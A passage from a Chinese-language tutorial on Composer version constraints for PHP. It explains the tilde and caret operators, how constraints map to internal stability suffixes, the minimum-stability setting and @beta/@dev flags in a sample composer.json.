需要注意的是，如果 ~ 作用在主版本号上，例如 ~1，按照上面的说法，Composer可以安装版本1以后的主版本，但是事实上是 ~1 会被当作 ~1.0 对待，只能增加小版本，不能增加主版本。

折音号 ^

^操作符的行为跟Semantic Versioning有比较大的关联，它允许升级版本到安全的版本。例如，^1.2.3相当于>=1.2.3 <2.0.0，因为在2.0版本前的版本应该都没有兼容性的问题。而对于1.0之前的版本，这种约束方式也考虑到了安全问题，例如^0.3会被当作>=0.3.0 <0.4.0对待。
例子：^1.2.3

版本稳定性

如果你没有显式的指定版本的稳定性，Composer会根据使用的操作符，默认在内部指定为-dev或者-stable。例如：

约束	内部约束
1.2.3	=1.2.3.0-stable
>1.2	>1.2.0.0-stable
>=1.2	>=1.2.0.0-dev
>=1.2-stable	>=1.2.0.0-stable
<1.3	<1.3.0.0-dev
<=1.3	<=1.3.0.0-stable
1 - 2	>=1.0.0.0-dev <3.0.0.0-dev
~1.3	>=1.3.0.0-dev <2.0.0.0-dev
1.4.*	>=1.4.0.0-dev <1.5.0.0-dev

例子：1.0 - 2.0

如果你想指定版本只要稳定版本，你可以在版本后面添加后缀 -stable。
minimum-stability 配置项定义了包在选择版本时对稳定性的选择的默认行为。默认是stable。它的值如下（按照稳定性排序）：dev，alpha，beta，RC和stable。除了修改这个配置去修改这个默认行为，我们还可以通过稳定性标识（例如@stable和@dev）来安装一个相比于默认配置不同稳定性的版本。例如：

{
    "require": {
        "monolog/monolog": "1.0.*@beta",
        "acme/foo": "@dev"
    }
}